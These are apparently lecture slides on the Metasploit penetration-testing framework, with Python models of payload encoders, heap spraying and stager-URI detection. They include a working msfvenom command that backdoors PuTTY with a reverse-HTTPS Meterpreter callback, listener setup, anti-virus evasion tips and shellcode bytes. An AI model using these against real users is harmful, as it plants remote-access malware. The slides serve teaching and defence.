Agenda
- Overview
- Injected PuTTY
- IE8 Heap Spray
- Web Scan & Java break-in
- Java Sandbox Break-out
- Conclusions
History
2003 – created by H.D. Moore
2007 – rewritten in Ruby (from Perl)
2009 – acquired by Rapid7 (still under the BSD license)
What is it?
- a framework (collection of tools and resources)
- used for penetration testing (pentesting)
- runs on Unices and Windows
Interfaces
- Metasploit Framework (command line)
- Metasploit Community (web based)
- Metasploit Express & Pro (commercial web based)
- Armitage (GUI)
Auxiliary Modules
- Used for scanning, fuzzing, sniffing and others
- Scanning examples:
- Locating the Tomcat server administration panel.
- FTP servers with anonymous access.
- Brute-forcing SSH servers.
- Fake servers that capture credentials for POP3, SMB, FTP, etc.
Rex library
- Independent classes and modules that provide the features the rest of the framework needs, such as:
- generating assembly instructions programmatically for certain architectures;
- support for useful protocols like HTTP, SMB;
- encoding;
- Opcode Database interaction, etc.
Basics
vulnerability → exploit → payload
Exploits
- Active:
- Run against a specific host.
- Example: against a server running badly configured or vulnerable software.
- Passive:
- Waiting on connections from victims.
- Example: publishing an injected file, serving Java/Flash exploits over HTTP.
Scenario
- The bad guy hosts a mirror of PuTTY which contains injected code.
- He listens for the connection the injected payload makes back from the victim's machine.
- The victim is running any recent Windows version.
Injecting encoded payloads
# Downloading the latest PuTTY.
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
msfvenom \
-p windows/meterpreter/reverse_https `# The payload.`\
-e x86/shikata_ga_nai `# Encode with Shikata ga nai...`\
-i 25 `# ...using 25 iterations.`\
-f exe `# Output as a Windows EXE file.`\
-k `# Inject as a new thread (preserves the template behaviour.)`\
-x ./putty.exe `# Using PuTTY as a template.`\
LHOST=192.168.1.102 `# The IP to connect back to (this machine).`\
LPORT=443 `# Default HTTPS port (inconspicuous).`\
> putty_bad.exe `# The output file.`
python -m SimpleHTTPServer 80 # Serve the backdoored binary from the current directory (Python 2).
msfpayload
Generates all the types of shellcodes.
msfencode
Encodes binary code in order to evade anti-viruses and get rid of bad characters.
msfvenom
The combination of these two tools. (msfpayload and msfencode have since been removed from the framework; msfvenom replaces both.)
How suspicious is this?
- VirusTotal is a free service which scans files using multiple anti-virus engines. (Anything uploaded there is shared with the vendors, so don't upload a payload you still want to use.)
- Using it, 7 of 48 engines detect the encoded injected payload.
- But they all say something different!
- They heuristically detect that something is suspicious, but not the specific threat.
Listening for victims
$ msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lport 443
set lhost 192.168.1.102
exploit
And now wait...
Let's analyze more closely.
Structure of injected file
Basic malware:
Polymorphic malware:
Why encode the payload?
- The transmission protocol or the vulnerable application may be sensitive to certain byte values.
- A payload is encoded so it passes through intact and does not break the injection.
- A common bad character is the null byte, since it terminates C strings.
- The decoder stub prepended to the encoded payload is usually very small.
Types of encoding
- polymorphic / non-polymorphic
- alphanumeric / non-alphanumeric
Polymorphic:
- DWORD_XOR Encoder (15+4 bytes): XORs every DWORD with one random 4-byte key.
- Countdown Encoder (12+0 bytes): XORs each byte with the current value of the loop counter register, so no key has to be stored.
- FNSTENV_MOV Encoder (15+4 bytes): uses the floating point unit (FPU) environment to find its own address.
- Jmp_call_additive encoder (21+4 bytes): every DWORD is encoded with a different key that depends on the previously decoded DWORD.
DWORD_XOR Encoder (source)
# Decoder stub; XORK is replaced by the 4-byte key chosen by the encoder.
Rex::Arch::X86.sub(-(((state.buf.length - 1) / 4) + 1), Rex::Arch::X86::ECX,
state.badchars) + # ecx = number of DWORDs to decode (emitted as "sub ecx, -n" so the immediate has no NUL bytes)
"\xe8\xff\xff\xff" + # call $+4: the rel32 of -1 borrows the next byte; pushes the address right after the call
"\xff\xc0" + # inc eax (its first byte is also the last byte of the call above)
"\x5e" + # pop esi: esi = the pushed address, i.e. a known position inside the stub
"\x81\x76\x0eXORK" + # xor dword [esi + 0xe], XORK: decode one DWORD of the payload in place
"\x83\xee\xfc" + # sub esi, -4: advance to the next DWORD (again avoiding a NUL in "add esi, 4")
"\xe2\xf4" # loop xor: decrement ecx and repeat until every DWORD is decoded
Shikata ga nai
- A Japanese expression meaning “it cannot be helped”.
- A.k.a. Polymorphic XOR Additive Feedback Encoder.
- Ranked "excellent", the highest rank in the framework. Highly polymorphic. Difficult to understand.
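The arithmetic behind the encoders above, as an added example that is not Metasploit's own code: the encoding side of DWORD_XOR, the bad-character check that drives key selection (the key itself is embedded in the stub, so it must be clean too), and the additive-feedback idea that gives Shikata ga nai and Jmp_call_additive a different key per DWORD. The real decoders are x86 stubs; only the transformation they undo is modelled here. The function names, the bad-character set and the sample bytes are constructed for this example.

```python
import os
import struct

BADCHARS = b"\x00\x0a\x0d"  # constructed: NUL, LF, CR (typical for a C string or text protocol)

# Constructed sample: "mov eax, 0" (which carries NUL bytes, the classic reason to
# encode) followed by the well-known Linux/x86 execve("/bin/sh") shellcode.
SAMPLE = (b"\xb8\x00\x00\x00\x00"
          b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")


def pad_to_dword(buf: bytes) -> bytes:
    """The DWORD encoders work on 4-byte blocks; pad the tail with NOPs."""
    return buf + b"\x90" * (-len(buf) % 4)


def dwords(buf: bytes):
    """Little-endian 32-bit view of a DWORD-aligned buffer."""
    return struct.unpack("<%dI" % (len(buf) // 4), buf)


def xor_dword(buf: bytes, key: int) -> bytes:
    """DWORD_XOR: every block XORed with one fixed 32-bit key (self-inverse)."""
    return struct.pack("<%dI" % (len(buf) // 4), *(d ^ key for d in dwords(buf)))


def xor_additive_feedback(buf: bytes, key: int, encode: bool) -> bytes:
    """Shikata-ga-nai-style feedback: after each block the key is advanced by
    the *decoded* block, so identical plaintext blocks encode differently and
    a corrupted block derails everything after it."""
    out = []
    for d in dwords(buf):
        res = d ^ key
        plain = d if encode else res
        key = (key + plain) & 0xFFFFFFFF
        out.append(res)
    return struct.pack("<%dI" % len(out), *out)


def has_badchars(data: bytes, badchars: bytes = BADCHARS) -> bool:
    return any(b in badchars for b in data)


def find_key(buf: bytes, encoder, badchars: bytes = BADCHARS, tries: int = 100_000):
    """msfencode-style key search: draw random 32-bit keys until neither the
    key (an immediate inside the stub) nor the output contains a bad char."""
    for _ in range(tries):
        key = struct.unpack("<I", os.urandom(4))[0]
        enc = encoder(buf, key)
        if not has_badchars(struct.pack("<I", key) + enc, badchars):
            return key, enc
    raise ValueError("no clean key found; try another encoder or fewer bad chars")


def demo():
    buf = pad_to_dword(SAMPLE)
    k1, e1 = find_key(buf, xor_dword)
    k2, e2 = find_key(buf, lambda b, k: xor_additive_feedback(b, k, True))
    rep = b"\x90" * 16  # four identical plaintext blocks
    return {
        "input_had_badchars": has_badchars(buf),
        "dword_clean": not has_badchars(e1),
        "dword_roundtrip": xor_dword(e1, k1) == buf,
        "feedback_clean": not has_badchars(e2),
        "feedback_roundtrip": xor_additive_feedback(e2, k2, False) == buf,
        # plain XOR leaks repetition in the plaintext; feedback hides it
        "dword_repeats": len(set(dwords(xor_dword(rep, k1)))) == 1,
        "feedback_repeats": len(set(dwords(xor_additive_feedback(rep, k2, True)))) == 4,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Note that random key search is exactly why an encoder can fail on a large bad-character set: every output byte and every key byte must avoid the set, and with the fixed-key encoder a single unlucky input DWORD rules out a whole class of keys. The feedback variant spreads that risk over the payload, which is one reason Shikata ga nai succeeds where simpler encoders give up.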
Payloads
- That is not the full payload!
- Self-contained payloads are more stable, but usually too big to fit in an exploit.
- Windows Meterpreter is about 700 kB.
- So payloads are sent in stages.
- The injected code only contains the stager.
- (Windows provides the WinINet library, which makes it easy to fetch content from a URL and keeps the stager small.)
Stager
- Establishes a connection to the attacker and processes further stages.
Reverse HTTPS Stager
- Tunnels communication over HTTP inside SSL/TLS.
- Advantages:
- HTTPS on port 443 is permitted even in locked-down corporate environments.
- The inner traffic cannot be inspected unless the proxy intercepts TLS.
- Each poll is a fresh HTTP request, so the session does not depend on one long-lived TCP connection and survives dropped connections and proxies.
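Where a proxy does intercept TLS (or where the plain reverse_http stager is used), the stager's first request is visible and has a recognisable shape. This added example, which is not Metasploit code, models both sides: the handler routes a request by the 8-bit checksum of the first URI path segment (sum of the ASCII bytes mod 256, Rex::Text.checksum8), and the values 92 (Windows/native stager) and 88 (Java stager) are the framework's routing constants; the stager picks a short random path that hashes to that value. The log format, the length heuristic and the log lines themselves are constructed for this example.

```python
import random
import string
from urllib.parse import urlsplit

URI_CHECKSUM_INITW = 92   # first request of the Windows (native) stager
URI_CHECKSUM_INITJ = 88   # first request of the Java stager
TAGS = {URI_CHECKSUM_INITW: "stager-windows", URI_CHECKSUM_INITJ: "stager-java"}
ALNUM = string.ascii_letters + string.digits
MAX_SEGMENT_LEN = 8       # heuristic (assumption): the stager's random path is short


def checksum8(segment: str) -> int:
    """Rex::Text.checksum8: sum of the bytes modulo 256."""
    return sum(segment.encode("ascii")) % 256


def generate_uri(target_sum: int, length: int = 4) -> str:
    """Attacker side: random alphanumeric path whose checksum8 equals
    target_sum (the idea behind the framework's generate_uri_checksum)."""
    while True:
        candidate = "".join(random.choices(ALNUM, k=length))
        if checksum8(candidate) == target_sum:
            return "/" + candidate


def first_segment(path: str) -> str:
    """First path component with any query string dropped, as the handler does."""
    parts = [p for p in path.split("?", 1)[0].split("/") if p]
    return parts[0] if parts else ""


def classify_uri(path: str):
    """Defender side: tag a path whose first segment is short, alphanumeric
    and hashes to one of the handler's routing checksums; None otherwise."""
    seg = first_segment(path)
    if not seg or not seg.isascii() or not seg.isalnum() or len(seg) > MAX_SEGMENT_LEN:
        return None
    return TAGS.get(checksum8(seg))


def scan_log(lines):
    """Constructed log format: '<time> <client> <method> <url>'.
    Returns one (time, client, path, tag) tuple per suspicious request."""
    hits = []
    for line in lines:
        time, client, _method, url = line.split()
        path = urlsplit(url).path or "/"
        tag = classify_uri(path)
        if tag:
            hits.append((time, client, path, tag))
    return hits


# Constructed proxy log: a benign page, a stager hit, a benign API call, a Java stager hit.
LOG = [
    "10:00:01 10.0.0.5 GET https://198.51.100.7/index.html",
    "10:00:02 10.0.0.5 GET https://198.51.100.7/aaa9",        # checksum8('aaa9') == 92
    "10:00:03 10.0.0.9 GET https://203.0.113.2/api/v1/status",
    "10:00:04 10.0.0.9 GET https://203.0.113.2/aaa5?x=1",    # checksum8('aaa5') == 88
]

if __name__ == "__main__":
    for hit in scan_log(LOG):
        print(*hit)
```

A random short alphanumeric segment matches one of the two checksums about 2 times in 256, so this is a weak indicator on its own: correlate it with what the page describes, repeated polling of the same external server over new connections, before acting on it.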
Reflective DLL injection
- A technique for loading a DLL that carries its own loader function (the reflective loader).
- The initial code downloads further stages directly into memory (by any means: raw sockets, HTTPS, etc.).
- The reflective loader allocates read-write-execute memory, maps the DLL's sections there, resolves its imports and applies relocations, so the OS loader and the disk never see the DLL.
- The resulting code can be used like any other library.
- Advantage: hard to detect. Writing executable code into memory is not suspicious in itself; JIT compilers such as Java's do it constantly.
Some payloads:
- PassiveX: circumvents firewalls by using an ActiveX control to create a hidden IE instance which can communicate freely with the attacker.
- NoNX: bypasses the no-execute bit implementation in Windows (Data Execution Prevention).
- Meterpreter: the biggest and most powerful payload.
Meterpreter
- Stealthily loaded into the memory of the process without writing to disk.
- It can spawn and migrate to other processes.
- Uses encrypted communication by default.
- Can be extended at runtime by loading other DLLs.
Meterpreter Features
- cat, cd, ls, pwd, ipconfig, ps: What you expect
- edit: Edit files using Vim. (cuz Emacs sux!)
- download, upload: get and send to the victim's system.
- execute: run a command
- hashdump: dump the password hashes from the SAM database.
- migrate: migrate to another process.
- shell: get a standard shell (like cmd).
- webcam_snap: take a webcam picture.
- Other things: capture keyboard, microphone; generate clicks and keystrokes...
Details
- An HTML+JS memory corruption bug in IE 8 (MS12-037, "same ID property").
- Requires a library without ASLR to build its ROP chain: the JRE (msvcr71.dll) on Windows XP SP3, Vista SP2 and 7 SP1; or the Visual C++ Runtime on XP SP3.
- Reason: IE mishandles two elements that share the same ID property; an element is freed during event handling and the freed memory is reused (a use-after-free).
- Uses a JS library for heap feng shui: manipulates the heap layout by making controlled allocations.
- Depends on the specific platform. Here: IE on Windows.
Heap spraying
- Fills large regions of memory with copies of a NOP sled followed by the shellcode, so that the address the exploit redirects to very likely falls on a sled.
- Compensates for the non-determinism of the heap layout (timing, chance alignments and other factors).
- Takes advantage of the fact that large heap allocations are usually placed at predictable, increasing addresses.
Idea
- The HTML page contains two elements with the same id (say idName).
- The memory is sprayed with the shellcode.
- Mouse events are triggered in which one element is deleted.
- The ID is referenced using eval('idName'). (It's supposed to return the element, but the freed object is dereferenced instead, and control ends up in the sprayed memory.)
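The spray arithmetic, as an added example that is not the exploit's JavaScript: why each block is a sled followed by the shellcode at its end, how the target address fixes the maximum shellcode size, and what happens when the spray is too small. It assumes the allocator places the blocks back to back from a block-aligned base (real allocators add headers, so exploits tune the string length to keep that alignment) and that the corrupted object jumps to TARGET; the block size, the base address, the classic target 0x0c0c0c0c and the stand-in shellcode are all assumptions of this example.

```python
from dataclasses import dataclass

BLOCK = 0x1000         # assumed size of one sprayed block
NOP = 0x90
TARGET = 0x0C0C0C0C    # the classic spray address, used here as an assumption


def sample_shellcode(n: int) -> bytes:
    """Constructed stand-in for real shellcode: 'jmp $' then int3 padding."""
    return b"\xeb\xfe" + b"\xcc" * (n - 2)


def build_block(shellcode: bytes, block: int = BLOCK) -> bytes:
    """NOP sled first, shellcode last, padded to exactly `block` bytes."""
    if not 2 <= len(shellcode) < block:
        raise ValueError("shellcode does not fit in one block")
    return bytes([NOP]) * (block - len(shellcode)) + shellcode


def max_shellcode_len(target: int = TARGET, block: int = BLOCK) -> int:
    """With a block-aligned base, `target` lands at offset target % block in
    whichever block it hits; the sled must reach at least that far."""
    return block - target % block


@dataclass
class Spray:
    base: int
    nblocks: int
    block: bytes

    def read(self, addr: int):
        """Byte at `addr`, or None if the address is outside the spray."""
        off = addr - self.base
        if not 0 <= off < self.nblocks * len(self.block):
            return None
        return self.block[off % len(self.block)]

    def execute_from(self, addr: int, shellcode: bytes) -> bool:
        """Model of control transfer to `addr`: slide over the NOPs, then
        require that execution reaches the shellcode at its first byte."""
        pc = addr
        while self.read(pc) == NOP:
            pc += 1
        reached = bytes(self.read(pc + i) or 0 for i in range(len(shellcode)))
        return reached == shellcode


def spray_up_to(shellcode: bytes, target: int = TARGET, base: int = 0x0C000000,
                block: int = BLOCK, cover: bool = True) -> Spray:
    """Spray enough blocks from `base` to reach `target` (one block short if cover=False)."""
    nblocks = (target - base) // block + (1 if cover else 0)
    return Spray(base, nblocks, build_block(shellcode, block))


def demo():
    ok = max_shellcode_len()            # 0x3f4 (1012 bytes) for 0x0c0c0c0c and 0x1000 blocks
    good, long_ = sample_shellcode(ok), sample_shellcode(ok + 1)
    return {
        "fits": spray_up_to(good).execute_from(TARGET, good),
        "one_byte_too_long": spray_up_to(long_).execute_from(TARGET, long_),
        "spray_too_small": spray_up_to(good, cover=False).execute_from(TARGET, good),
    }


if __name__ == "__main__":
    print(hex(max_shellcode_len()), demo())
```

The one-byte-too-long case is the instructive one: the jump lands inside the shellcode rather than on the sled, so the spray "worked" (memory was there) and the exploit still crashes. That is why real sprays keep the shellcode well under the limit and why a target whose low bits are small (for instance 0x0a0a0a0a) buys more room than 0x0c0c0c0c.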
Details
- Takes advantage of the Java RMI server default config.
- (An active exploit.)
- Java Remote Method Invocation is an object-oriented RPC mechanism.
- The default config allows loading classes from any remote HTTP location. (Oracle changed the default of java.rmi.server.useCodebaseOnly to true in Java 7u21, which blocks this.)
- Bytecode Advantage (TM pending): the exploit works reliably across 5 different platforms and 3 architectures.
- RMI method calls don't do any authentication.
Details
- Affects Oracle Java versions prior to 7u25.
- Runs from an applet and escapes the Java sandbox through a memory corruption bug.
- The bug is invalid array indexing in the storeImageArray() function of the native jre/bin/awt.dll.
- This code calls storeImageArray and triggers the corruption:
new AffineTransformOp(new java.awt.geom.AffineTransform(1,0,0,1,0,0), null);
? – discovered through the Packet Storm Bug Bounty program
18.06.2013 – fixed by Oracle
11.08.2013 – disclosed
15.08.2013 – implemented in Metasploit
Conclusions
- Metasploit is the most successful such framework.
- Considered the de facto exploit development framework.
Others
- w3af: focused on web applications, so less general than Metasploit.
- Core Impact: best competitor, but not free.
Prevention (usual stuff)
- Keep software up to date (the IE and Java bugs shown here all had patches available).
- Security through obscurity raises the attacker's cost but is not a control on its own:
- Configure software to not give away its identity and version.
- Use non-default ports.
- Don't pass sensitive data through insecure channels (e.g. FTP, telnet).
- Verify downloaded binaries against the publisher's signature or hashes before running them (the injected PuTTY fails such a check).
Sources
http://www.offensive-security.com/metasploit-unleashed/
http://en.wikipedia.org/wiki/Metasploit_Project
http://www.exploit-db.com/wp-content/themes/exploit/docs/18532.pdf
http://blog.strategiccyber.com/2013/06/28/staged-payloads-what-pen-testers-should-know/
http://www.rapid7.com/db/modules/exploit/windows/browser/ms12_037_same_id
http://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server
http://www.rapid7.com/db/modules/exploit/multi/browser/java_storeimagearray
http://www.osvdb.org/82865
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ms12_037_same_id.rb
http://www.exploit-db.com/exploits/27526/
http://en.wikipedia.org/wiki/Heap_spraying
https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
http://www.levinkv.ru/bezopasnost/metasploit/metasploit-penetration-testing-cookbook-%D1%87%D0%B0%D1%81%D1%82%D1%8C-1.html
http://www.harmonysecurity.com/files/HS-P005_ReflectiveDllInjection.pdf